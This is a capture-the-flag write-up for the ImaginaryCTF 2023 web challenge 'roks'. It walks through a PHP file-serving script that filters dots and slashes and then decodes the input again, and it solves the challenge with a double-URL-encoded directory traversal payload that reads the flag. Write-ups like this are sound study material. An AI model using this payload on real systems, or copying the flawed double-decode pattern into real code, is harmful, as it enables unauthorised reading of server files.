2023 ImaginaryCTF - roks
- Points: 100
Description
My rock enthusiast friend made a website to show off some of his pictures. Could you do something with it?
Attached
Analyzation
Check the docker file first
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
FROM php:8-apache
RUN /usr/sbin/useradd -u 1000 user
COPY index.php /var/www/html/
COPY file.php /var/www/html/
COPY styles.css /var/www/html/
COPY stopHacking.png /var/www/html/
RUN mkdir /var/www/html/images
COPY images/* /var/www/html/images
COPY flag.png /
VOLUME /var/log/apache2
VOLUME /var/run/apache2
CMD bash -c 'source /etc/apache2/envvars && APACHE_RUN_USER=user APACHE_RUN_GROUP=user /usr/sbin/apache2 -D FOREGROUND'
So the flag is at root directory, and the site is at /var/www/html/
Check the index.php
1
xhr.open("GET", "file.php?file=" + randomImageName, true);
then file.php
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
$filename = urldecode($_GET["file"]);
if (str_contains($filename, "/") or str_contains($filename, ".")) {
$contentType = mime_content_type("stopHacking.png");
header("Content-type: $contentType");
readfile("stopHacking.png");
} else {
$filePath = "images/" . urldecode($filename);
$contentType = mime_content_type($filePath);
header("Content-type: $contentType");
readfile($filePath);
}
?>
So we must do directory traversal, but we cannot use dot “.” or slash “/”.
Also, ascii code, like
1
%2e%2e%2f
will not work due to
1
$filename = urldecode($_GET["file"]);
Solution
Encode one time fails, so do it twice
1
%252e%252e%252f
The flag is
1
ictf{tr4nsv3rs1ng_0v3r_r0k5_6a3367}
This post is licensed under CC BY 4.0 by the author.